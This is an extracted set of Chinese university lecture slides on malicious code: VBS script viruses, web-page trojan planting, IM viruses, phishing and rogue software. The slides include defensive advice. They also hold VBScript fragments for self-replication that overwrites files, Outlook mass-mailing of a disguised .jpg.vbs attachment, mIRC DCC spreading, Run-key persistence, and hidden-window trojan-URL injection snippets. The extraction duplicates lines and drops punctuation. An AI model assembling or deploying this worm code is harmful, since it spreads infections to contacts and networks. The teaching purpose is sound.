1、计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系第5章 其它恶意代码分析u脚本病毒的基本原理及其防治u即时通讯病毒u网络钓鱼u流氓软件计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系脚本病毒的基本原理及其防治uWSH简介 WSH是Windows Scripting Host(Windows脚本宿主)的缩略形式,是一个基于32位Windows平台、并独立于语言的脚本运行环境,是一种批次语言/自动执行工具 文件名为WScript.exe(若是在
2、DOS命令提示符下,则为CScript.exe,命令格式:CScript FileName.vbs)计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系脚本病毒的基本原理及其防治 WScript.exe使得脚本可以被执行,就象执行批处理一样 在WSH脚本环境里,预定义了一些对象,通过这些内置对象,可以实现获取环境变量、创建快捷方式、加载程序、读写注册表等功能计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系脚本病毒的基本原理及其防治 这是大多数利
3、用VB Script编写的病毒的一个特点Set fso=CreateObject(Scripting.FileSystemObject)fso.Getfile(c:1.txt).Copy(e:2.txt)计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系脚本病毒的基本原理及其防治 如果用regsvr32 scrrun.dll/u禁止了文件系统对象,在执行包含脚本的则提示失败计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系脚本病毒的基本原理及其
4、防治 访问文件系统WScript.Echo(WSH应用举例)弹出对话框窗口在D盘根目录下建立10个新文件夹dim objdirset objdir=WScript.Createobject(Scripting.filesystemobject)for k=1 to 10 sNewFolder=d:WSHsample&k 给新的文件夹命名 objdir.Createfolder(sNewFolder)next计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系脚本病毒的基本原理及其防治在C盘根目录创建一个文本文件testf
5、ile.txtSet RegWsh=Wscript.CreateObject(Wscript.Shell)RegWsh.Run(notepad&Wscript.ScriptFullName)用SHELL对象启动程序Set fs=Wscript.CreateObject(Scripting.FileSystemObject)Set a=fs.CreateTextFile(c:testfile.txt,True)a.WriteLine(Hello World!)a.Close计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全
6、系脚本病毒的基本原理及其防治 访问注册表创建对象 Set 对象变量名=WScript.CreateObject(WScript.Shell)对象的方法 读注册表键值的操作RegRead 创建/修改注册表键值的操作RegWrite 删除注册表键值的操作RegDelete计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系脚本病毒的基本原理及其防治Dim RegWsh,sReadKey,sPrompt,sFixpromptSet RegWsh=WScript.CreateObject(WScript.Shell)RegWsh
7、.RegWrite HKCUMyRegKey,一级键值 创建一级键值sReadKey=RegWsh.RegRead(HKCUMyRegKey)读取(默认)键值RegWsh.RegDelete“HKCUMyRegKey”删除一级键值计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系脚本病毒的基本原理及其防治uVBS脚本病毒的特点 编写简单 破坏力大 感染力强 传播范围大 病毒源码容易被获取,变种多 欺骗性强 使得病毒生产机实现起来非常容易计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系
8、版权所有:北京工业大学计算机学院信息安全系脚本病毒的基本原理及其防治uVBS脚本病毒如何感染复制set fso=createobject(scripting.filesystemobject)set fso=createobject(scripting.filesystemobject)创建一个文件系统对象set self=fso.opentextfile(wscript.scriptfullname,1)set self=fso.opentextfile(wscript.scriptfullname,1)读打开当前文件(即病毒本身)vbscopy=self.readallvbscopy=se
9、lf.readall 读取病毒全部代码到字符串变量vbscopyset ap=fso.opentextfile(set ap=fso.opentextfile(目标文件目标文件.path,2,true).path,2,true)打开目标文件,准备写入病毒代码ap.write vbscopy ap.write vbscopy 将病毒代码覆盖目标文件ap.closeap.closeset cop=fso.getfile(set cop=fso.getfile(目标文件目标文件.path).path)得到目标文件路径cop.copy(cop.copy(目标文件目标文件.path&.vbs).path
10、&.vbs)创建另外一个病毒文件(以.vbs为后缀)目标文件目标文件.delete(true).delete(true)删除目标文件计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系脚本病毒的基本原理及其防治u文件搜索代码该函数主要用来寻找满足条件的文件,并生成对应文件的一个病毒副本sub scan(folder_)sub scan(folder_)scan函数定义,on error resume next on error resume next 如果出现错误,直接跳过,防止弹出错误窗口 set folder_=fs
11、o.getfolder(folder_)set folder_=fso.getfolder(folder_)set files=folder_.files set files=folder_.files 当前目录的所有文件集合 for each file in filesext=fso.GetExtensionName(file)for each file in filesext=fso.GetExtensionName(file)获取文件后缀 ext=lcase(ext)ext=lcase(ext)后缀名转换成小写字母 if ext=mp3 then if ext=mp3 then 如果后缀
12、名是mp3,则进行感染。Wscript.echo(file)Wscript.echo(file)end ifend if nextnext set subfolders=folder_.subfolders set subfolders=folder_.subfolders for each subfolder in subfolders for each subfolder in subfolders 搜索其他目录;递归调用scan()scan(subfolder)scan(subfolder)next nextend sub计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计
13、算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系脚本病毒的基本原理及其防治uVBS脚本病毒通过网络传播的几种方式及代码分析 通过Email附件传播Function mailBroadcast()Function mailBroadcast()on error resume next on error resume next wscript.echo wscript.echo Set outlookApp=CreateObject(Outlook.Application)Set outlookApp=CreateObject(Outlook.Application)创建一个OUTLO
14、OK应用的对象 If outlookApp=Outlook ThenIf outlookApp=Outlook Then Set mapiObj=outlookApp.GetNameSpace(MAPI)Set mapiObj=outlookApp.GetNameSpace(MAPI)获取MAPI的名字空间 Set addrList=mapiObj.AddressListsSet addrList=mapiObj.AddressLists 获取地址表的个数计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系脚本病毒的基本
15、原理及其防治病毒理论及防治技术 北京工业大学计算机学院For Each addr In addrListFor Each addr In addrList If addr.AddressEntries.Count 0 Then If addr.AddressEntries.Count 0 Then addrEntCount=addr.AddressEntries.Count addrEntCount=addr.AddressEntries.Count 获取每个地址表的Email记录数 For addrEntIndex=1 To addrEntCount For addrEntIndex=1 T
16、o addrEntCount 遍历地址表的Email地址 Set item=outlookApp.CreateItem(0)Set item=outlookApp.CreateItem(0)获取一个邮件对象实例 Set addrEnt=addr.AddressEntries(addrEntIndex)Set addrEnt=addr.AddressEntries(addrEntIndex)获取具体Email地址 item.To=addrEnt.Address item.To=addrEnt.Address 填入收信人地址 item.Subjectitem.Subject=病毒传播实验 写入邮件
17、标题 item.Bodyitem.Body=这里是病毒邮件传播测试!写入文件内容 计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系脚本病毒的基本原理及其防治 Set attachMents=item.Attachments Set attachMents=item.Attachments 定义邮件附件 attachMents.Add fileSysObj.GetSpecialFolder(0)&test.jpg.vbs“attachMents.Add fileSysObj.GetSpecialFolder(0)&te
18、st.jpg.vbs“item.DeleteAfterSubmit=True item.DeleteAfterSubmit=True 信件提交后自动删除 If item.To ThenIf item.To Then item.Send item.Send 发送邮件 shellObj.regwrite HKCUsoftwareMailtestmailed,1shellObj.regwrite HKCUsoftwareMailtestmailed,1 病毒标记,以免重复感染 End IfEnd If Next Next End If End If Next Next End if End ifEn
19、d FunctionEnd Function计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系脚本病毒的基本原理及其防治 通过局域网共享传播welcome_msg=welcome_msg=网络连接搜索测试网络连接搜索测试“Set WSHNetwork=WScript.CreateObject(WScript.Network)Set WSHNetwork=WScript.CreateObject(WScript.Network)创建一个网络对象Set oPrinters=WshNetwork.EnumPrinterCon
20、nectionsSet oPrinters=WshNetwork.EnumPrinterConnections 创建一个网络打印机连接列表WScript.Echo Network printer mappings:WScript.Echo Network printer mappings:For i=0 to oPrinters.Count 1 Step 2 For i=0 to oPrinters.Count 1 Step 2 显示网络打印机连接情况 WScript.Echo Port&oPrinters.Item(i)&=&oPrinters.Item(i+1)WScript.Echo P
21、ort&oPrinters.Item(i)&=&oPrinters.Item(i+1)NextNextSet colDrives=WSHNetwork.EnumNetworkDrives Set colDrives=WSHNetwork.EnumNetworkDrives 创建一个网络共享连接列表计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系脚本病毒的基本原理及其防治If colDrives.Count=0 ThenIf colDrives.Count=0 Then MsgBox MsgBox 没有可列出的驱动器。
22、没有可列出的驱动器。,vbInformation+vbOkOnly,welcome_msg,vbInformation+vbOkOnly,welcome_msgElseElse strMsg=strMsg=当前网络驱动器连接当前网络驱动器连接:&CRLF:&CRLF For i=0 To colDrives.Count-1 Step 2For i=0 To colDrives.Count-1 Step 2 strMsg=strMsg&Chr(13)&Chr(10)&colDrives(i)strMsg=strMsg&Chr(13)&Chr(10)&colDrives(i)&Chr(9)&col
23、Drives(i+1)&Chr(9)&colDrives(i+1)NextNext MsgBox strMsg,vbInformation+vbOkOnly,welcome_msgMsgBox strMsg,vbInformation+vbOkOnly,welcome_msg显示当前网络驱动器连接显示当前网络驱动器连接End IfEnd If计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系脚本病毒的基本原理及其防治u通过感染htm、asp、jsp、php等网页文件传播 在注册表HKEY_CLASSES_ROOTCLS
24、ID下我们可以找到这么一个主键F935DC22-1CF0-11D0-ADB9-00C04FD58A0B,注册表中对它他的说明是“Windows Script Host Shell Object”同样,我们也可以找到0D43FE01-F093-11CF-8940-00A0C9054228,注册表对它的说明是“FileSystem Object”计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系脚本病毒的基本原理及其防治利用利用CLSIDCLSID创建实例创建实例document.write(APPLET HEIGHT=0
25、 WIDTH=0 document.write();code=com.ms.activeX.ActiveXComponent);function creatObj()function creatObj()try try obj=document.applets0;obj=document.applets0;obj.setCLSID(0D43FE01-F093-11CF-8940-00A0C9054228);obj.setCLSID(0D43FE01-F093-11CF-8940-00A0C9054228);计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权
26、所有:北京工业大学计算机学院信息安全系脚本病毒的基本原理及其防治 obj.createInstance();/obj.createInstance();/创建一个实例创建一个实例 fso=obj.GetObject();/fso=obj.GetObject();/获取文件系统对象,以便写文件获取文件系统对象,以便写文件 tsObj=fso.OpenTextFile(c:testCLSID.txt,2,true);tsObj=fso.OpenTextFile(c:testCLSID.txt,2,true);tsObj.Write(Hello FSO);tsObj.Write(Hello FSO)
27、;tsObj.Close();tsObj.Close();obj.setCLSID(F935DC22-1CF0-11D0-ADB9-00C04FD58A0B);obj.setCLSID(F935DC22-1CF0-11D0-ADB9-00C04FD58A0B);obj.createInstance();/obj.createInstance();/创建一个实例创建一个实例 WshShell=obj.GetObject();/WshShell=obj.GetObject();/获取获取ShellShell对象,以便运行程序对象,以便运行程序 WshShell.Run(notepad c:test
28、CLSID.txt);WshShell.Run(notepad c:testCLSID.txt);计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系脚本病毒的基本原理及其防治 catch(e)catch(e)单击按钮,将在单击按钮,将在C C盘创建文件,并用记事本打开该文件盘创建文件,并用记事本打开该文件input type=button value=false 计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系脚本病毒的基本原理及其防治 通过
29、IRC聊天通道传播Dim mirc,ifso Dim mirc,ifso set ifso=CreateObject(Scripting.FileSystemObject)set ifso=CreateObject(Scripting.FileSystemObject)set mirc=fso.CreateTextFile(C:mircscript.ini)set mirc=fso.CreateTextFile(C:mircscript.ini)创建文件创建文件script.iniscript.inifso.CopyFile Wscript.ScriptFullName,C:mircattac
30、hment.vbs,True fso.CopyFile Wscript.ScriptFullName,C:mircattachment.vbs,True 将病毒文件备份到将病毒文件备份到attachment.vbsattachment.vbsmirc.WriteLine script mirc.WriteLine script mirc.WriteLine n0=on 1:join:mirc.WriteLine n0=on 1:join:*.*:if($nick!=$me)halt/dcc send$nick:if($nick!=$me)halt/dcc send$nick C:mircatt
31、achment.vbs C:mircattachment.vbs 利用命令利用命令/ddc send$nick attachment.vbs/ddc send$nick attachment.vbs给通道中的其他用户传送病毒文件给通道中的其他用户传送病毒文件mirc.Close mirc.Close 计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系脚本病毒的基本原理及其防治uVBS脚本病毒如何获得控制权 修改注册表项HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVe
32、rsionRunWSH.RegWrite(strName,anyValue,strType)计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系脚本病毒的基本原理及其防治 通过映射文件执行方式新欢乐时光将dll的执行方式修改为wscript.exe。甚至可以将exe文件的映射指向病毒代码 欺骗用户,让用户自己执行 desktop.ini和folder.htt互相配合计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系脚本病毒的基本原理及其防治uVB
33、S脚本病毒的弱点 绝大部分VBS脚本病毒运行的时候需要用到一个对象:FileSystemObject VBScript代码是通过Windows Script Host来解释执行的 VBS脚本病毒的运行需要其关联程序Wscript.exe的支持 计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系脚本病毒的基本原理及其防治 通过网页传播的病毒需要ActiveX的支持 通过Email传播的病毒需要OE的自动发送邮件功能支持,但是绝大部分病毒都是以Email为主要传播方式的 计算机病毒与防范技术计算机病毒与防范技术 版权所有:
34、北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系脚本病毒的基本原理及其防治u如何预防和解除vbs脚本病毒 禁用文件系统对象FileSystemObjectregsvr32 scrrun.dll/uHKEY_CLASSES_ROOTCLSID 卸载Windows Scripting Host 删除VBS、VBE、JS、JSE文件后缀名与应用程序的映射计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系脚本病毒的基本原理及其防治 在Windows目录中,找到WScript.exe,更改名称或者删除
35、自定义安全级别 禁止OutlookExpress的自动收发邮件功能 显示扩展名计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系脚本病毒的基本原理及其防治 将系统的网络连接的安全级别设置至少为“中等”,它可以在一定程度上预防某些有害的Java程序或者某些ActiveX组件对计算机的侵害 安装杀毒软件计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系网页挂马u网页挂马 在获取网站或者网站服务器的部分或者全部权限后,在网页文件中插入一段恶意代码 这
36、些恶意代码主要是一些包括IE等漏洞利用代码 用户访问被挂马的页面时,如果系统没有更新恶意代码中利用的漏洞补丁,则机会执行恶意代码程序,进行盗号等危险操作计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系网页挂马u常见的网页挂马方式 框架挂马 js文件挂马 document.write();计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系网页挂马 js变形加密 flash木马 http:/网页木马地址 插入木马地址 width=10 heigh
37、t=10,GET 宽度和高度计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系网页挂马 不点出现链接的木马 页面要显示的内容 function www_163_com()var url=你的木马地址;open(url,NewWindow,toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10);计算机病
38、毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系网页挂马 隐蔽挂马top.document.body.innerHTML=top.document.body.innerHTML+rn/url css中挂马bodybackground-image:url(javascript:document.write()计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系网页挂马 Java挂马 window.open(地址,toolbar=no,location=n
39、o,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1);图片伪装 计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系网页挂马 伪装调用 计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系网页挂马 高级欺骗 页面要显示的内容 function www_163_com()var url=网马地址;open(url,NewWindow,toolbar=no,loca
40、tion=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10);计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系即时通讯病毒u根据国外专业调查机构的研究报告显示,目前企业中有60%以上的员工在使用即时通讯软件进行实时交流u但是调查报告同时显示,只有不到10%的公司建立了针对IM软件的管理规范u给别有用心的病毒制造者提供了难得的空间计算机
41、病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系即时通讯病毒uQQ使用UDP协议进行发送和接收“消息”病毒程序利用系统提供的API向OICQ的“文件发送”按钮发送“点击”命令,将病毒文件传送给正在聊天的伙伴u微软提供了的MSN的程序开发接口,允许程序开发人员在MSN上进行开发 病毒制造者编写利用MSN的文件传送功能进行传播的病毒计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系即时通讯病毒u即时通讯软件绕过防火墙的方法 ICQProxy Socks
42、Cap32 HTTPPort Socks2HTTP eBorderClient FileGateway计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系即时通讯病毒u利用MSN附件进行传播计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系即时通讯病毒u通过伪装方式进行传播 病毒是一个可执行程序,采用了图片文件的图标 当用户打开这个“图片”时,病毒被释放计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:
43、北京工业大学计算机学院信息安全系即时通讯病毒u利用远程控制方式传播 中毒的计算机自动登录到MSN服务器上,并注册成为攻击者MSN Messenger的好友之一 病毒利用的是底层协议,用户即使不安装MSN Messenger,也可能被病毒感染 黑客们常常把这些病毒与流行软件、网络游戏外挂程序等捆绑在一起,供人们下载使其中毒 成功侵入用户的电脑之后,会把其设置成为一台网络服务器。攻击者只要在浏览器里输入这台电脑的网络地址,就会弹出控制页面计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系即时通讯病毒u伪装MSN登录框窃取密
44、码 运行时会弹出一个仿制的MSN登录框,用户用自己的密码登录MSN,该程序会给出出错信息并自动退出 用户的密码信息以文本文档的形式记录在用户的C盘中,伺机发送给病毒制造者计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系即时通讯病毒u防范即时通讯病毒的安全建议 尽量不要在公共场合使用IM软件 随时注意微软公司官方的安全公告,及时下载更新系统漏洞补丁 对发送文件提高警惕 建议使用6位以上的复杂密码计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系
45、网络钓鱼u网络钓鱼(Phishing)一词是“Fishing”和“Phone”的结合体u网络钓鱼从根本上来讲是一种欺诈行为,或者说是利用互联网实施的网络诈骗u利用欺骗性的电子邮件和伪造的Web站点计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系网络钓鱼u诈骗者通常会将自己伪装成知名银行、网上商城或信用卡公司等正规公司和信誉度较高的知名品牌以博得用户的信任u受骗者往往会泄露自己的个人数据,如信用卡号、账户、密码、社保编号等内容计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:
46、北京工业大学计算机学院信息安全系网络钓鱼u利用电子邮件“钓鱼”计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系网络钓鱼u利用虚假网址“钓鱼”计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系网络钓鱼u利用即时消息攻击计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系网络钓鱼u在2010年,有近28%的互联网用户遭遇过虚假钓鱼网站、诈骗交易、交易劫持、网银被盗等针对网络
47、购物的安全攻击计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系防范网络钓鱼的安全建议u金融机构采取的网上安全防范措施 在网上提供“保护客户端安全控件”,用户可以下载并安装此控件,防范卡号和密码被木马程序窃取 提供一种类似于“加密狗”的个人客户证书 派专业人员监控网络信息,一旦发现网络欺诈行为或者仿冒的网站立即向有关部门汇报;给每笔交易的设置最高支付限额计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系防范网络钓鱼的安全建议u对于个人用户的安全
48、建议 牢记自己经常使用的网上银行及其他金融机构的网址及服务电话,最好自己直接输入银行域名 在申请网络金融服务时,应严格遵照银行的操作规程办事,建议采用银行提供的所有安全方式进行自我保护 密码至少应该设在6位以上,并且建议采取大小写字母、数字混合的组合方式,不要选用诸如身份证号码、出生日期、电话号码等作为密码 不要将密码等信息以文本形式保存在计算机中计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系防范网络钓鱼的安全建议u对于个人用户的安全建议 在网上进行金融交易时,应对每一笔交易进行详细记录,在每次交易结束后再次与相关
49、机构核对,并定期核查自己的“历史交易明细”记录 不要在网吧等公共场合使用网上金融工具进行交易,也不要将存有交易记录的个人计算机借给他人使用 使用杀毒软件、防火墙等网络安全产品计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系流氓软件u流氓软件实际上是具有一定的实用价值但也具有一些电脑病毒和黑客的行为特征的软件,它是为制造者的商业利益服务的u在获取商业利益的同时,严重地损害着软件使用者的利益计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系流氓软
50、件u流氓软件的行为 诱导或强行将客户端程序安装到用户的计算机上且禁止用户卸载 利用“COOKIE”在后台秘密收集用户上网习惯、浏览顺序、所关心的话题、经常访问和搜索的网站等信息,为制作者的商业计划提供必要的信息计算机病毒与防范技术计算机病毒与防范技术 版权所有:北京工业大学计算机学院信息安全系版权所有:北京工业大学计算机学院信息安全系流氓软件u流氓软件的行为 在IE浏览器上添加广告按钮或者某些网站的栏目链接,而且禁止用户自行删除 在未经用户允许的情况下,频繁且大量地向用户发送广告信息,强迫客户浏览强行弹出的广告,而且很多广告框没有关闭按钮,只有完全播放完毕才自行关闭计算机病毒与防范技术计算机病
